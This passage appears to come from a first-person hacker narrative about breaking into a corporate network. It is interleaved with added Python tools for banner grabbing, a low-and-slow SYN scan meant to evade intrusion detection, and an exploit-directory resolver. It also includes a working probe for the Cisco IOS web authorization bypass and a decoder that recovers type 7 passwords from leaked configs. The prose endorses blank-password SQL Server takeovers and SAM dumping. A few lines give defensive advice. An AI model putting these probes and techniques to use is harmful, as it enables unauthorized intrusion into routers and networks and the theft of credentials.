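    (r"sendmail", "UNIX (Sendmail)"),
    (r"apache", "UNIX-like (Apache)"),
]


def grab_banner(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Full TCP connect (this shows up in the target's logs). Send a
    minimal HEAD request on 80; on 25 just read the server's greeting."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port == 80:
            s.sendall(HTTP_PROBE % host.encode())
        return s.recv(4096)


def http_server_header(raw: bytes) -> Optional[str]:
    """Extract the Server: header value from an HTTP response head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def smtp_greeting(raw: bytes) -> Optional[str]:
    """Return the text after the 220 code of an SMTP greeting."""
    first = raw.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    m = re.match(r"220[ -](.*)", first)
    return m.group(1).strip() if m else None


def guess_platform(banner: Optional[str]) -> str:
    """Map a banner string to a platform label via PLATFORM_HINTS."""
    if not banner:
        return "Unknown"
    low = banner.lower()
    for pattern, label in PLATFORM_HINTS:
        if re.search(pattern, low):
            return label
    return "Unknown"


def identify(raw: bytes, port: int) -> Tuple[Optional[str], str]:
    """(banner, platform guess) for a raw response read from port 80 or 25."""
    banner = http_server_header(raw) if port == 80 else smtp_greeting(raw)
    return banner, guess_platform(banner)


# Constructed sample responses (not captured from any real host).
SAMPLE_HTTP_NT4 = (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
                   b"Content-Type: text/html\r\n\r\n")
SAMPLE_SMTP_SUN = (b"220 mail.example.com ESMTP Sendmail 8.11.6+Sun/8.11.6; "
                   b"Thu, 26 Dec 2002 14:02:11 -0800\r\n")
# A server whose admin stripped the Server: header gives this probe nothing.
SAMPLE_HTTP_QUIET = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    for raw, port in ((SAMPLE_HTTP_NT4, 80), (SAMPLE_SMTP_SUN, 25),
                      (SAMPLE_HTTP_QUIET, 80)):
        print(port, identify(raw, port))
```

Against live hosts, replace the samples with grab_banner(host, 80) or grab_banner(host, 25). The SMTP greeting is the more honest of the two: it is sent before the client says anything, so it cannot be suppressed by request filtering, only by reconfiguring the MTA's banner.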
For Microsoft SQL Servers, there's LinSQL. This is a wonderful tool, essentially a Microsoft SQL client for Linux that I've modified to fit my needs. It never ceases to amaze me that network administrators put Microsoft SQL Servers in positions where they are accessible from the Internet. Another item that astounds me is how many times I've come across a Microsoft SQL Server where the sa account password is blank. Sometimes, that is enough to provide direct access to the network. LinSQL relies on the xp_cmdshell extended stored procedure to execute any commands you send to the operating system. Some administrators are smart enough to remove that procedure from the SQL Server. For those cases, I use SQLAT, for SQL Auditing Tools.
SQLAT is another Linux/BSD-based tool kit that can be used against Microsoft SQL Servers. SQLAT is essentially a suite of tools that can do dictionary attacks, upload files, read the system Registry, as well as dump the SAM. There is also a tool for doing a minimal analysis of a SQL Server with the output viewable as HTML. The tool suite requires access to the sa account in order to run some of the tools, but this usually is not a problem. If the SQL administrator has removed the xp_cmdshell extended procedure, the tool temporarily restores xp_cmdshell. In order to do this, the dynamic link library (DLL) containing the xp_cmdshell code must still be on the system. SQLAT provides a wealth of information about the SQL Server and makes cracking it much easier. Once I've gathered the necessary information about the SQL Server, I can obtain access to the system very soon thereafter.
My toolkit is wide and varied, and it contains a whole slew of exploits I have acquired over the years. I keep everything in what I call an "attack tree" directory structure. Essentially, I have exploits broken down between UNIX exploits and Windows-based exploits. From there, I break down these two categories into the subcategories of remote and local. Then I subdivide the remote and local categories into exploits for various services. The next level is the breakdown of the exploits based on the operating system they affect. The structure of the attack tree is mirrored in the attack tree directory structure. If I needed an exploit against, say, Solaris 8's snmpXdmid service, I would go to the directory named /exploits/unix/remote/snmp/solaris/8 to look for the exploit code or a binary that has already been compiled and is ready to run. The tree structure looks something like this:

Exploit Attack Tree Structure (figure; reconstructed from the description above):

exploits
    unix
        remote
            HTTP    SMTP    Telnet    SNMP    ...
        local
            HTTP    SMTP    Telnet    SNMP    ...
    windows
        remote
            HTTP    SMTP    Telnet    SNMP    ...
        local
            HTTP    SMTP    Telnet    SNMP    ...

Below each service directory sit one directory per affected operating system and, under that, one per version (unix/remote/snmp/solaris/8 in the example above).
This is by no means exhaustive. I also keep exploits or information about exploits for network devices like Cisco routers and switches. I have a directory dedicated to default passwords for various systems and accounts. All in all, I have a pretty big toolbox for cracking into networks.
Once I get into a system, I usually try to dump out either the SAM or capture the UNIX password and shadow files. If I can get those, then I download them to my local system and run them through John the Ripper. It's the best open-source password cracker around, in my opinion. I've used it for a long time, and I've traded john.pot files with friends. My john.pot collection is now over 10MB, and my password list that John uses is almost 60MB. On a Windows box, if I can get access and obtain the SAM, I'm pretty much guaranteed that I'll have a password that I can use to further exploit that access.
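The attack tree layout from the passage above, as an added example (my code, not anything from the chapter): a resolver that walks exploits/<platform>/<remote|local>/<service>/<os>/<version> and returns the most specific matches first, falling back to version-independent code that sits directly under the <os> directory. The sample tree is built in a temporary directory from empty placeholder files whose names are assumed; nothing in it is a real exploit.

```python
"""Resolve exploits from an "attack tree" directory layout.

Layout, as the text describes it:
  exploits/<platform>/<remote|local>/<service>/<os>/<version>/
Added example, not the narrator's tooling. SAMPLE_FILES are constructed,
empty placeholders, not real exploits.
"""
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

SAMPLE_FILES = [
    "unix/remote/snmp/solaris/8/snmpxdmid.c",          # version-specific
    "unix/remote/snmp/solaris/snmp-community-brute.py",  # any Solaris
    "unix/remote/http/linux/apache-chunked.c",
    "windows/remote/http/nt/4.0/iis4-unicode.py",
    "windows/local/kernel/nt/4.0/getadmin.exe",
]


def build_sample_tree(root: Path) -> None:
    """Create the placeholder files so the lookups below have a tree to walk."""
    for rel in SAMPLE_FILES:
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.touch()


def resolve(root: Path, platform: str, scope: str, service: str,
            os_name: str, version: Optional[str] = None) -> List[str]:
    """Exploits for the request, most specific directory first: the
    <os>/<version> directory, then files directly under <os> (code that
    applies to every version). Paths are returned relative to the root."""
    base = root / platform / scope / service / os_name
    dirs = ([base / version] if version else []) + [base]
    found: List[str] = []
    for d in dirs:
        if d.is_dir():
            found.extend(sorted(p.relative_to(root).as_posix()
                                for p in d.iterdir() if p.is_file()))
    return found


def demo() -> Dict[str, List[str]]:
    """Build the sample tree and answer the lookup from the text plus two
    more: a version with no specific directory, and a Windows service."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return {
            "solaris8_snmp": resolve(root, "unix", "remote", "snmp", "solaris", "8"),
            "solaris7_snmp": resolve(root, "unix", "remote", "snmp", "solaris", "7"),
            "nt4_http": resolve(root, "windows", "remote", "http", "nt", "4.0"),
        }


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

The fallback is the point of keeping version-independent code one level up: a Solaris 7 lookup still surfaces the generic SNMP tooling even though no solaris/7 directory exists.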
THE SCAN
If you're going to scan a target, you need to pick the right time of day to do it. You must consider the possibility of detection seriously, especially since IDSs are getting better and better. Although the night might be a good time to scan, since they would probably be running a skeleton shift in terms of NOC personnel, I figured that the day would be a better choice. During the day, the volume of traffic going to and from their site would help hide my scans.
To start with, there was no point in doing a scan that pinged their hosts. Some IDSs trigger on that kind of activity, even if it's fairly low level. And most networks, if they're tight, will filter inbound ICMP echo requests. So, I started off by doing what can be called a "blind scan." This scan basically scans for some common ports using what is called a TCP SYN scan. With this type of scan, nmap completes two out of three steps of the three-way handshake TCP uses to establish a connection. This tends to allow me to avoid being detected by IDSs if I'm also careful to slow down the scan.
I prefer to use a SYN scan rather than a full-connect scan, because a connect scan will probably log the connection somewhere and may alert the network administrators that something suspicious is going on. So, for these guys, I slowed the scan down and looked only for ports 20, 21, 22, 23, 25, 80, and 443 (I expected to find 80 and 443, but I wanted to look for the others as well).
The initial scan went well. I identified six interesting hosts. How do I define interesting? Good question. Interesting means that there were multiple ports open on the host and that some of them were running services that could provide an avenue into the network. Some of these hosts were running two services, although both services were tied to the same application—a Web server. They all appeared to be behind a router that was providing some filtering features (looks like I guessed correctly), and they varied in their OS mixture. I made a list of systems and services I found (the IP addresses have been changed to protect the "innocent").

Hosts Discovered and Available Services

IP Address      Ports Open             Operating System
10.89.144.133   80 (WWW)               Cisco device
10.89.144.140   80 (WWW)               Cisco device
10.89.144.155   80 (WWW), 443 (SSL)    Windows NT 4.0
10.89.144.154   22 (SSH)               Unknown
10.89.144.166   80 (WWW), 443 (SSL)    Windows 2000
10.89.144.241   25 (SMTP)              Sun
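The scan described in this section, as an added example (my code, not the narrator's script): nmap_command() builds the argv for a slow, no-ping SYN scan of exactly those seven ports, and parse_grepable() reduces nmap's grepable (-oG) output to the hosts that actually have something open, in the shape of the table above. The command is returned rather than run, so the block works offline; SAMPLE_GREPABLE is constructed and reuses the already-changed addresses from the text.

```python
"""Build a slow no-ping SYN scan and reduce `nmap -oG` output to a host table.

Added example, not the narrator's script. SAMPLE_GREPABLE is constructed.
"""
import shlex
from typing import Dict, Iterable, List

PORTS = [20, 21, 22, 23, 25, 80, 443]
SERVICE_NAMES = {20: "FTP-data", 21: "FTP", 22: "SSH", 23: "telnet",
                 25: "SMTP", 80: "WWW", 443: "SSL"}


def nmap_command(target: str, ports: Iterable[int] = PORTS,
                 timing: str = "T1") -> List[str]:
    """argv for the scan the text describes. -sS is the half-open SYN scan
    (raw sockets, so root); -Pn skips the ICMP echo a tight perimeter drops
    and an IDS may flag; -n avoids reverse DNS queries that would touch the
    target's resolvers; -T1 spreads the probes out in time; -oG - writes
    grepable output to stdout. Returned, not executed."""
    return ["nmap", "-sS", "-Pn", "-n", "-" + timing,
            "-p", ",".join(str(p) for p in ports), "-oG", "-", target]


def parse_grepable(text: str) -> Dict[str, List[int]]:
    """Map IP -> sorted open TCP ports. Entries in the Ports: field look
    like `80/open/tcp//http///`; closed and filtered entries are dropped."""
    hosts: Dict[str, List[int]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        open_ports = []
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) >= 3 and fields[1] == "open" and fields[2] == "tcp":
                open_ports.append(int(fields[0]))
        if open_ports:
            hosts[ip] = sorted(open_ports)
    return hosts


def interesting(hosts: Dict[str, List[int]],
                avenues: Iterable[int] = (21, 22, 23, 25, 80, 443)) -> Dict[str, List[int]]:
    """Keep hosts exposing at least one service that offers a way in."""
    return {ip: p for ip, p in hosts.items() if any(x in avenues for x in p)}


def render(hosts: Dict[str, List[int]]) -> str:
    """Plain-text table in the shape of the chapter's host list."""
    rows = ["IP Address       Ports Open"]
    for ip in sorted(hosts, key=lambda a: tuple(int(o) for o in a.split("."))):
        desc = ", ".join(f"{p} ({SERVICE_NAMES.get(p, '?')})" for p in hosts[ip])
        rows.append(f"{ip:<16} {desc}")
    return "\n".join(rows)


# Constructed sample output; not a capture from any real network.
SAMPLE_GREPABLE = (
    "# Nmap scan initiated as: nmap -sS -Pn -n -T1 -p 20,21,22,23,25,80,443 -oG - 10.89.144.0/24\n"
    "Host: 10.89.144.133 ()\tPorts: 80/open/tcp//http///\tIgnored State: filtered (6)\n"
    "Host: 10.89.144.155 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: filtered (5)\n"
    "Host: 10.89.144.154 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: filtered (6)\n"
    "Host: 10.89.144.241 ()\tPorts: 25/open/tcp//smtp///, 23/filtered/tcp//telnet///\tIgnored State: filtered (5)\n"
    "Host: 10.89.144.250 ()\tPorts: 20/closed/tcp//ftp-data///\tIgnored State: filtered (6)\n"
)

if __name__ == "__main__":
    print(shlex.join(nmap_command("10.89.144.0/24")))
    print(render(interesting(parse_grepable(SAMPLE_GREPABLE))))
```

From the defender's side, the same grepable output is what you want from a scheduled scan of your own perimeter: diff today's parse_grepable() result against yesterday's and a new open port shows up as a one-line change.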
I had this list, but now I needed to find out some more information. First off, the Cisco devices—what were they? Were they routers or switches? Since I had access to the Web servers on these devices, that's where I started.
STUPID CISCO TRICKS
Cisco switches and routers had an interesting bug in their Web servers a while back. This bug allowed you to bypass the authentication in the Web server and gain access to selected commands on the device. It was really simple, and I was quite amazed that no one else ever had figured it out before I saw it (hell, I even kicked myself for not thinking about it earlier). Anyway, the exploit goes like this: You send a URL like the following to the device: http://IP-address/<xx>/exec/-/show/config, where <xx> is a number from 19 to 99. If the Cisco device is vulnerable, you see something like this:
(Screenshot: Cisco Web Authentication Bypass Vulnerability)
Very slick. Now, I still wasn't sure how I was going to access this device beyond the use of the Web server, but I'd figure that out later. But from what I saw on my screen now, this was definitely a router, and in particular, a Cisco router.
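The bypass described above, as an added example (my code, not the narrator's): candidate_urls() walks the 19..99 level range from the text, looks_like_ios_config() decides whether what came back is really an IOS configuration rather than a login page that happened to return 200, and harvest_type7() goes one step past the text by reversing any "password 7" strings in the leaked config on the spot. Two path forms are tried: the one written in the chapter and the /level/<nn>/exec/<command> form in which Cisco's own advisory for this bug described it; that second form and the test vector 0822455D0A16 are from memory, not from the page. SAMPLE_CONFIG and SAMPLE_LOGIN are constructed.

```python
"""Probe for the IOS HTTP server authorization bypass and mine the result.

Added example, not the narrator's tool. SAMPLE_CONFIG and SAMPLE_LOGIN are
constructed; the /level/<nn>/exec/ path form and the type 7 test vector
0822455D0A16 -> "cisco" are from memory of the advisory, not from the page.
"""
import re
import urllib.error
import urllib.request
from typing import Dict, Iterable, Iterator, Optional, Tuple

# The chapter's /<xx>/exec/-/<cmd> and the advisory's /level/<xx>/exec/<cmd>.
PATH_TEMPLATES = ("/{level}/exec/-/{cmd}", "/level/{level}/exec/{cmd}")


def candidate_urls(host: str, levels: Iterable[int] = range(19, 100),
                   cmd: str = "show/config") -> Iterator[str]:
    """Yield every privilege-level URL to try, in the text's 19..99 range."""
    for level in levels:
        for tpl in PATH_TEMPLATES:
            yield "http://" + host + tpl.format(level=level, cmd=cmd)


# Lines only an IOS running configuration would contain.
CONFIG_MARKERS = [re.compile(p, re.MULTILINE) for p in (
    r"^version \d+\.\d", r"^hostname \S+", r"^enable (?:secret|password) ",
    r"^interface \S+", r"^line (?:vty|con) ", r"^snmp-server community ")]


def looks_like_ios_config(body: str, min_markers: int = 2) -> bool:
    """A 200 that carries a login page or an error is not a leak; insist on
    several config-only lines before calling the device vulnerable."""
    return sum(1 for rx in CONFIG_MARKERS if rx.search(body)) >= min_markers


def probe(host: str, timeout: float = 5.0) -> Optional[Tuple[str, str]]:
    """First (url, body) that returns a configuration, or None. Network
    I/O: each request is a full TCP connection the device may log."""
    for url in candidate_urls(host):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("latin-1", "replace")
        except (urllib.error.URLError, OSError):
            continue
        if looks_like_ios_config(body):
            return url, body
    return None


TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(enc: str) -> str:
    """Reverse 'service password-encryption' (type 7): a two-digit decimal
    seed, then hex bytes each XORed with a byte of a fixed rolling key."""
    seed = int(enc[:2])
    data = bytes.fromhex(enc[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("latin-1")


def harvest_type7(config: str) -> Dict[str, str]:
    """Every 'password 7 <hex>' in a config (line, enable, username...)
    mapped to plaintext. 'enable secret 5' is MD5-crypt and is left alone."""
    return {enc: decode_type7(enc)
            for enc in re.findall(r"\bpassword 7 ([0-9A-Fa-f]{4,})", config)}


SAMPLE_CONFIG = """!
version 12.0
service password-encryption
hostname corp-gw
!
enable secret 5 $1$abcd$0123456789abcdefghijkl
!
interface FastEthernet0/0
 ip address 10.89.144.133 255.255.255.0
!
line vty 0 4
 password 7 0822455D0A16
 login
!
"""
SAMPLE_LOGIN = "<html><body><h1>Authorization Required</h1></body></html>"

if __name__ == "__main__":
    print(looks_like_ios_config(SAMPLE_CONFIG), looks_like_ios_config(SAMPLE_LOGIN))
    print(harvest_type7(SAMPLE_CONFIG))
```

Two things a practitioner should take from this. First, the leak is worth far more than a banner: type 7 is obfuscation, not encryption, so a vty or enable password in the config is the device's password, and an "enable secret 5" line is a crackable MD5-crypt hash for John the Ripper. Second, the device-side fix is not a filter on these URLs but turning the HTTP server off (no ip http server) or, where it is needed, authenticating it against a real user database (ip http authentication local or aaa) on a fixed IOS version; probes like this one are also a cheap thing to run against your own routers after every IOS upgrade.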